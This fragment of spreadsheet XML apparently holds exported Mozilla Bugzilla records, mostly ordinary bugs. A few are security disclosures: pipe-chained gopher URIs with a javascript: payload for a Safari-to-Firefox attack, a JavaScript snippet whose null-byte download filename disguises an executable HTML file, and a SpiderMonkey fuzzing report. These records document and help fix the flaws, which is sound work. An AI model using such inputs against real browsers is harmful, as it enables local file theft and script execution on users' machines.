          <t>Core</t>
        </is>
      </c>
      <c r="J4157" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K4157" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L4157" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4157" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4157" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4157" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4157" t="inlineStr">
        <is>
          <t>[clouseau][gfx-noted]</t>
        </is>
      </c>
      <c r="Q4157" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4157" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4157" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T4157" t="n">
        <v>1</v>
      </c>
      <c r="U4157" t="n">
        <v>0</v>
      </c>
      <c r="V4157" t="n">
        <v>14</v>
      </c>
      <c r="W4157" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-a7116c93-d902-4023-b592-dbf3c0170918.
=============================================================
There are 5 crashes in nightly 57 starting with buildid 20170918100058. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1400602.
[1] https://hg.mozilla.org/mozilla-central/rev?node=c4f1d0d1852b6e61c7a3e78ec8c0e33879c20d95</t>
        </is>
      </c>
      <c r="X4157" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4158">
      <c r="A4158" t="n">
        <v>905802</v>
      </c>
      <c r="B4158" t="inlineStr">
        <is>
          <t>2013-08-15 14:12:07 -0700</t>
        </is>
      </c>
      <c r="C4158" t="inlineStr">
        <is>
          <t>Problem when other languages entered into http://www.mozilla.org/en-US/legal/fraud-report/index.html</t>
        </is>
      </c>
      <c r="D4158" t="inlineStr">
        <is>
          <t>2013-12-02 18:07:02 -0800</t>
        </is>
      </c>
      <c r="E4158" t="n">
        <v>1</v>
      </c>
      <c r="F4158" t="n">
        <v>1</v>
      </c>
      <c r="G4158" t="n">
        <v>5</v>
      </c>
      <c r="H4158" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4158" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J4158" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4158" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4158" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4158" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4158" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4158" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4158" t="inlineStr">
        <is>
          <t>[kb=1079695]  r=122662</t>
        </is>
      </c>
      <c r="Q4158" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4158" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4158" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4158" t="n">
        <v>1</v>
      </c>
      <c r="U4158" t="n">
        <v>0</v>
      </c>
      <c r="V4158" t="n">
        <v>18</v>
      </c>
      <c r="W4158" t="inlineStr">
        <is>
          <t>Sometimes comments are entered into this form in languages other than English and email generated replaces the letters that aren't used in English with things like "angeh&amp;Atilde;&amp;curren;ngte." It makes it very hard to translate these messages. Is it possible to make it understand at least the accents and umlauts used in Spanish, French, German and other European languages?</t>
        </is>
      </c>
      <c r="X4158" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4159">
      <c r="A4159" t="n">
        <v>488842</v>
      </c>
      <c r="B4159" t="inlineStr">
        <is>
          <t>2009-04-17 07:07:50 -0700</t>
        </is>
      </c>
      <c r="C4159" t="inlineStr">
        <is>
          <t>Local Scope Variables are not displayed by default</t>
        </is>
      </c>
      <c r="D4159" t="inlineStr">
        <is>
          <t>2009-05-28 07:27:43 -0700</t>
        </is>
      </c>
      <c r="E4159" t="n">
        <v>1</v>
      </c>
      <c r="F4159" t="n">
        <v>1</v>
      </c>
      <c r="G4159" t="n">
        <v>3</v>
      </c>
      <c r="H4159" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4159" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4159" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4159" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4159" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4159" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4159" t="inlineStr">
        <is>
          <t>[firebug-p1] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4159" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4159" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4159" t="inlineStr">
        <is>
          <t>mozilla1.9.1b4</t>
        </is>
      </c>
      <c r="T4159" t="n">
        <v>1</v>
      </c>
      <c r="U4159" t="n">
        <v>0</v>
      </c>
      <c r="V4159" t="n">
        <v>36</v>
      </c>
      <c r="W4159" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090416 Firefox/3.5b4pre
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090416 Firefox/3.5b4pre
Starting with the Mozilla 1.9.1 branch (Firefox 3.5), most local scope variables are not displayed by default in either the Javascript Debugger add-on window or ChromeBug which seems to indicate a problem with the underlying venkman code.
In the Mozilla 1.9.1 branch any "missing" variables can be added as a watch and they will display correctly.  In the nightly trunk loads, watched scope variables appear to display data associated with other variables (basically garbage data).  I'm going to file the 2nd problem as a separate bug.
Reproducible: Always
Steps to Reproduce:
1. Open Javascript Debugger Window (Venkman)
2. Breakpoint some function
3. Cause breakpoint to hit
Actual Results:  
Not all local scope variables are displayed.
Expected Results:  
All local scope variables should be displayed like they were in Firefox 3.0.x.
I've noticed this for a long time with Firefox 3.5 builds going back to the early alphas so it's been a problem for a while now.</t>
        </is>
      </c>
      <c r="X4159" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4160">
      <c r="A4160" t="n">
        <v>790856</v>
      </c>
      <c r="B4160" t="inlineStr">
        <is>
          <t>2012-09-12 20:34:03 -0700</t>
        </is>
      </c>
      <c r="C4160" t="inlineStr">
        <is>
          <t>Window resize accessed a dangling DocumentViewerImpl</t>
        </is>
      </c>
      <c r="D4160" t="inlineStr">
        <is>
          <t>2013-01-10 12:34:51 -0800</t>
        </is>
      </c>
      <c r="E4160" t="n">
        <v>1</v>
      </c>
      <c r="F4160" t="n">
        <v>1</v>
      </c>
      <c r="G4160" t="n">
        <v>3</v>
      </c>
      <c r="H4160" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4160" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4160" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K4160" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4160" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4160" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4160" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4160" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4160" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q4160" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4160" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4160" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T4160" t="n">
        <v>1</v>
      </c>
      <c r="U4160" t="n">
        <v>0</v>
      </c>
      <c r="V4160" t="n">
        <v>14</v>
      </c>
      <c r="W4160" t="inlineStr">
        <is>
          <t>Created attachment 660685
stack traces from ASan
I wasn't able to reproduce this.  Can you figure it out from the stacks, and knowing that the fuzzer was opening and closing windows?</t>
        </is>
      </c>
      <c r="X4160" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4161">
      <c r="A4161" t="n">
        <v>441120</v>
      </c>
      <c r="B4161" t="inlineStr">
        <is>
          <t>2008-06-22 05:16:44 -0700</t>
        </is>
      </c>
      <c r="C4161" t="inlineStr">
        <is>
          <t>command-line URLs launch multi-tabs if Firefox not running, exploitable with Safari Carpet bombing</t>
        </is>
      </c>
      <c r="D4161" t="inlineStr">
        <is>
          <t>2017-03-22 10:11:41 -0700</t>
        </is>
      </c>
      <c r="E4161" t="n">
        <v>1</v>
      </c>
      <c r="F4161" t="n">
        <v>1</v>
      </c>
      <c r="G4161" t="n">
        <v>3</v>
      </c>
      <c r="H4161" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4161" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4161" t="inlineStr">
        <is>
          <t>Startup and Profile System</t>
        </is>
      </c>
      <c r="K4161" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4161" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4161" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4161" t="inlineStr">
        <is>
          <t>[sg:critical] when combined w/bug 441169, sg:high with file: URIs</t>
        </is>
      </c>
      <c r="Q4161" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4161" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4161" t="inlineStr">
        <is>
          <t>mozilla1.9.1a1</t>
        </is>
      </c>
      <c r="T4161" t="n">
        <v>1</v>
      </c>
      <c r="U4161" t="n">
        <v>0</v>
      </c>
      <c r="V4161" t="n">
        <v>54</v>
      </c>
      <c r="W4161" t="inlineStr">
        <is>
          <t>Billy Rios reported that if Firefox is not already running, passing it a command-line URI with pipe symbols will open multiple tabs (apparently because it's being treated as a home-page). If Firefox is running then it's treated as a single URI with pipe symbols and probably come up with something pretty mangled.
Not only is the inconsistency of behavior depending on state a bug, this allows another application to bypass the fix for bug 305269 and bug 298255 which disallowed apps from loading chrome: uris.
This also potentially puts non-Firefox users at risk from Firefox bugs if a unique protocol handler allows launching Firefox. Someone who tried Firefox for a while and went back to their previous browser might end up with an old vulnerable Firefox, and an attacker might be able to use this trick to send the user to an exploit page.
Examples that work in Safari on Windows:
gopher:https://www.google.com|www.test.com|javascript:alert(1)
gopher:https://www.google.com|www.test.com|chrome://browser/content/browser.xul 
Although Firefox 3 no longer registers for the gopher: protocol, neither does it appear to delete a pre-existing Firefox 2 registration. A user who has upgraded from an earlier Firefox might still be at risk.
Now combine this with the Safari "Carpet Bombing" attack: Safari drops .html files onto the desktop, uses this trick to have Firefox open them. In Firefox 2 this file can now rummage through your disk and exfiltrate anything interesting (cookies? password file? financial documents?).
Firefox 3 users are protected by the fix for bug 230606 -- the dropped file can only read the contents of known files (because directories can't be read) in the same directory or below. Didn't expect that fix to pay off so quickly, less than a week since launch.
Nate McFeeters also pointed out that even in the "fixed" Safari 3.1.2, data: uris with unknown content-types are downloaded to the c:\tmp directory (even if %TMP% is set to something else) with somewhat predictable names.
It's unclear how bad the bypass of bug 305269 is (loading chrome:). Simply opening most chrome URIs doesn't cause any bad action, but with zillions of addons out there I wouldn't want to guarantee that.</t>
        </is>
      </c>
      <c r="X4161" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4162">
      <c r="A4162" t="n">
        <v>810463</v>
      </c>
      <c r="B4162" t="inlineStr">
        <is>
          <t>2012-11-09 12:48:51 -0800</t>
        </is>
      </c>
      <c r="C4162" t="inlineStr">
        <is>
          <t>Build performance test suite for l20n.js</t>
        </is>
      </c>
      <c r="D4162" t="inlineStr">
        <is>
          <t>2012-12-15 23:34:16 -0800</t>
        </is>
      </c>
      <c r="E4162" t="n">
        <v>1</v>
      </c>
      <c r="F4162" t="n">
        <v>1</v>
      </c>
      <c r="G4162" t="n">
        <v>5</v>
      </c>
      <c r="H4162" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4162" t="inlineStr">
        <is>
          <t>L20n</t>
        </is>
      </c>
      <c r="J4162" t="inlineStr">
        <is>
          <t>JS Library</t>
        </is>
      </c>
      <c r="K4162" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4162" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4162" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4162" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4162" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4162" t="inlineStr"/>
      <c r="Q4162" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4162" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4162" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T4162" t="n">
        <v>1</v>
      </c>
      <c r="U4162" t="n">
        <v>0</v>
      </c>
      <c r="V4162" t="n">
        <v>2</v>
      </c>
      <c r="W4162" t="inlineStr">
        <is>
          <t>In order to be able to track performance (bug 802857) we need a small suite of performance measurements.
The plan is to build in a small set of tickers behind a flag that will measure:
1) Warmup time: time that it takes for l20n code to be loaded
Per context:
2) Bootstrap time: time needed to set up ctx
3) Resource loading: time between ctx object is available and when all resources are loaded.
4) Parsing: time taken on parsing resources
5) Compilation: time taken to compile available resources
6) Execution: time taken for all 'get*' accumulated
Per document:
7) HTML l10n: time taken to localize a full HTML document</t>
        </is>
      </c>
      <c r="X4162" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4163">
      <c r="A4163" t="n">
        <v>853456</v>
      </c>
      <c r="B4163" t="inlineStr">
        <is>
          <t>2013-03-21 08:14:37 -0700</t>
        </is>
      </c>
      <c r="C4163" t="inlineStr">
        <is>
          <t>target=_blank doesn't work with &lt;img&gt; links</t>
        </is>
      </c>
      <c r="D4163" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:00 -0800</t>
        </is>
      </c>
      <c r="E4163" t="n">
        <v>1</v>
      </c>
      <c r="F4163" t="n">
        <v>1</v>
      </c>
      <c r="G4163" t="n">
        <v>6</v>
      </c>
      <c r="H4163" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4163" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4163" t="inlineStr">
        <is>
          <t>Web Apps (PWAs)</t>
        </is>
      </c>
      <c r="K4163" t="inlineStr">
        <is>
          <t>20 Branch</t>
        </is>
      </c>
      <c r="L4163" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4163" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4163" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4163" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4163" t="inlineStr">
        <is>
          <t>[A4A]</t>
        </is>
      </c>
      <c r="Q4163" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4163" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4163" t="inlineStr">
        <is>
          <t>Firefox 23</t>
        </is>
      </c>
      <c r="T4163" t="n">
        <v>1</v>
      </c>
      <c r="U4163" t="n">
        <v>0</v>
      </c>
      <c r="V4163" t="n">
        <v>12</v>
      </c>
      <c r="W4163" t="inlineStr">
        <is>
          <t>from an email:
it seems that there is a bug that only affects webapps on Android, whereby hyperlinks that contain an img do not open externally. 
Works (opens externally):
&lt;div class="image"&gt;&lt;a href="{href}" target="_blank"&gt;{text}&lt;/a&gt;&lt;/ div&gt;
Doesn't work (opens internally):
&lt;div class="image"&gt;&lt;a href="{href}" target="_blank"&gt;&lt;img src="{src}"/&gt;&lt;/a&gt;&lt;/div&gt;
This issue only appears to affect the app runtime on Android, as it works fine on the Firefox beta browser on Android and on Firefox OS full screen web apps.</t>
        </is>
      </c>
      <c r="X4163" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4164">
      <c r="A4164" t="n">
        <v>1637745</v>
      </c>
      <c r="B4164" t="inlineStr">
        <is>
          <t>2020-05-13 13:42:50 -0700</t>
        </is>
      </c>
      <c r="C4164" t="inlineStr">
        <is>
          <t>An a.download with null characters results in unexpected filename on disk</t>
        </is>
      </c>
      <c r="D4164" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:22 -0800</t>
        </is>
      </c>
      <c r="E4164" t="n">
        <v>1</v>
      </c>
      <c r="F4164" t="n">
        <v>1</v>
      </c>
      <c r="G4164" t="n">
        <v>3</v>
      </c>
      <c r="H4164" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4164" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4164" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K4164" t="inlineStr">
        <is>
          <t>75 Branch</t>
        </is>
      </c>
      <c r="L4164" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4164" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4164" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4164" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4164" t="inlineStr">
        <is>
          <t>[adv-main79+][adv-ESR78.1+]</t>
        </is>
      </c>
      <c r="Q4164" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4164" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4164" t="inlineStr">
        <is>
          <t>mozilla80</t>
        </is>
      </c>
      <c r="T4164" t="n">
        <v>1</v>
      </c>
      <c r="U4164" t="n">
        <v>0</v>
      </c>
      <c r="V4164" t="n">
        <v>30</v>
      </c>
      <c r="W4164" t="inlineStr">
        <is>
          <t>Created attachment 9148148
Screen Shot 2020-05-13 at 1.33.25 PM.png
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Steps to reproduce:
Triggering a client-side download of data can be done using this code:
```js
// this is essentially how https://www.npmjs.com/package/downloadjs works.
const a = document.createElement('a');
a.href = URL.createObjectURL(new Blob(["&lt;html&gt;&lt;body&gt;&lt;script&gt;alert('hello')&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;"]));
a.download = 'my-filename.html\u0000.csv';
a.dispatchEvent(new MouseEvent('click'));
```
Actual results:
Running the code above results in Firefox opening the download manager and prompting the user to open or save the file. If the user chooses to save the file, the suggested filename _appears_ to be "my-filename.html*.csv", where * is a unicode font graphic indicating U+0000.
In reality, the saved filename is "my-filename.html". Later, when the user navigates to their downloads and opens "my-filename.html", the javascript payload will be executed by their default browser.
The saved file becomes "HTML Text".
Expected results:
Chrome handles this by replacing the U+0000 in the filename with a U+005F (underscore).
Other characters above and beyond U+0000 may require similar treatment.
I assume someone smarter than me would be able to figure out how to use this as an attack vector, so I have ticked the security box for this bug.</t>
        </is>
      </c>
      <c r="X4164" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4165">
      <c r="A4165" t="n">
        <v>10261</v>
      </c>
      <c r="B4165" t="inlineStr">
        <is>
          <t>1999-07-20 22:08:50 -0700</t>
        </is>
      </c>
      <c r="C4165" t="inlineStr">
        <is>
          <t>UpdateView() drops dirty rects</t>
        </is>
      </c>
      <c r="D4165" t="inlineStr">
        <is>
          <t>2024-03-18 11:32:52 -0700</t>
        </is>
      </c>
      <c r="E4165" t="n">
        <v>1</v>
      </c>
      <c r="F4165" t="n">
        <v>1</v>
      </c>
      <c r="G4165" t="n">
        <v>6</v>
      </c>
      <c r="H4165" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4165" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4165" t="inlineStr">
        <is>
          <t>GFX</t>
        </is>
      </c>
      <c r="K4165" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4165" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4165" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4165" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4165" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4165" t="inlineStr"/>
      <c r="Q4165" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4165" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4165" t="inlineStr">
        <is>
          <t>M11</t>
        </is>
      </c>
      <c r="T4165" t="n">
        <v>1</v>
      </c>
      <c r="U4165" t="n">
        <v>0</v>
      </c>
      <c r="V4165" t="n">
        <v>6</v>
      </c>
      <c r="W4165" t="inlineStr">
        <is>
          <t>The UpdateView() function just returns if refresh is disabled, and doesn't
accumulate the dirty rects and then trigger a repaint once refresh is enabled.
Here's the offending code:
  NS_PRECONDITION(nsnull != aView, "null view");
  if (!mRefreshEnabled &amp;&amp; 0 == mUpdateBatchCnt) {
    return NS_OK;
  }</t>
        </is>
      </c>
      <c r="X4165" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4166">
      <c r="A4166" t="n">
        <v>1883542</v>
      </c>
      <c r="B4166" t="inlineStr">
        <is>
          <t>2024-03-04 17:19:27 -0800</t>
        </is>
      </c>
      <c r="C4166" t="inlineStr">
        <is>
          <t>Assertion failure: GetThisObject(thisObj) == thisObj</t>
        </is>
      </c>
      <c r="D4166" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:35 -0700</t>
        </is>
      </c>
      <c r="E4166" t="n">
        <v>1</v>
      </c>
      <c r="F4166" t="n">
        <v>1</v>
      </c>
      <c r="G4166" t="n">
        <v>3</v>
      </c>
      <c r="H4166" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4166" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4166" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4166" t="inlineStr">
        <is>
          <t>Firefox 125</t>
        </is>
      </c>
      <c r="L4166" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4166" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4166" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4166" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4166" t="inlineStr">
        <is>
          <t>[adv-main125+][adv-esr115.10+]</t>
        </is>
      </c>
      <c r="Q4166" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4166" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4166" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T4166" t="n">
        <v>1</v>
      </c>
      <c r="U4166" t="n">
        <v>0</v>
      </c>
      <c r="V4166" t="n">
        <v>32</v>
      </c>
      <c r="W4166" t="inlineStr">
        <is>
          <t>Created attachment 9389269
POC to trigger assertion wihtin debug builds
Steps to reproduce:
The attached sample is a minimized sample from fuzzing an older version of the spider monkey engine. This sample causes the assertion error to be triggered within a debug build of the Spidermonkey engine. This was confirmed to still be trigger-able on a new build as well as build from over a year ago. Apologies for not directly narrowing down to see when this was added. The below code block identifies the output when running the sample.
Assertion failure: GetThisObject(thisObj) == thisObj, at ./js/src/vm/Interpreter.cpp:636
#01: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x1da3be0]
#02: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x1db47c5]
#03: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x1da211f]
#04: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x1da56fc]
#05: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x25367c5]
#06: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x25384af]
#07: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x253c712]
#08: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x2552d7b]
#09: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x1dcba05]
#10: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x1da2bab]
#11: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x1da3d3e]
#12: js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x24b71ce]
#13: js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x2491920]
#14: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x24a5fe7]
#15: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x1da3135]
#16: ???[./obj-x86_64-pc-linux-gnu/dist/bin/js +0x29a252c]
#17: ??? (???:???)
zsh: segmentation fault  ./obj-x86_64-pc-linux-gnu/dist/bin/js ~/POC_assertion.js
Actual results:
This crash is believed to be caused during the Baseline Interpreter Compilation phase. Excuse the target component as we were unsure if this direct component is under the JIT sub category. 
This was confirmed during testing as including `--no-blinterp` would stop the incorrect optimization to occur. Unfortunately we were not able to further narrow down the bug from this.
We believe this to be directly related to the debugging framework as noted by the use of the debug functionality within the POC, as such we do not believe the security impact is major, but will hold off further any further assumptions.
The second POC demonstrates utilizing this bug to gain an incorrect JIT range analysis through an incorrect assumption made from the result of the exec.</t>
        </is>
      </c>
      <c r="X4166" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4167">
      <c r="A4167" t="n">
        <v>355744</v>
      </c>
      <c r="B4167" t="inlineStr">
        <is>
          <t>2006-10-06 10:44:55 -0700</t>
        </is>
      </c>
      <c r="C4167" t="inlineStr">
        <is>
          <t>Bugs are not added to mandatory groups on bug creation</t>
        </is>
      </c>
      <c r="D4167" t="inlineStr">
        <is>
          <t>2006-10-06 13:37:06 -0700</t>
        </is>
      </c>
      <c r="E4167" t="n">
        <v>1</v>
      </c>
      <c r="F4167" t="n">
        <v>1</v>
      </c>
      <c r="G4167" t="n">
        <v>4</v>
      </c>
      <c r="H4167" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4167" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4167" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K4167" t="inlineStr">
        <is>
          <t>2.23</t>
        </is>
      </c>
      <c r="L4167" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4167" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4167" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4167" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4167" t="inlineStr"/>
      <c r="Q4167" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4167" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4167" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T4167" t="n">
        <v>1</v>
      </c>
      <c r="U4167" t="n">
        <v>0</v>
      </c>
      <c r="V4167" t="n">
        <v>7</v>
      </c>
      <c r="W4167" t="inlineStr">
        <is>
          <t>group restriction isn't applied on bug creation.
file a bug into restricted prod(*) with r? not_in_the_group and
 it worked, he receives a mail and can see the bug
* Entry/Mandatory/Mandatory/Canedit</t>
        </is>
      </c>
      <c r="X4167" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4168">
      <c r="A4168" t="n">
        <v>510987</v>
      </c>
      <c r="B4168" t="inlineStr">
        <is>
          <t>2009-08-17 14:49:22 -0700</t>
        </is>
      </c>
      <c r="C4168" t="inlineStr">
        <is>
          <t>GetUpvarOnTrace reads from wrong frame</t>
        </is>
      </c>
      <c r="D4168" t="inlineStr">
        <is>
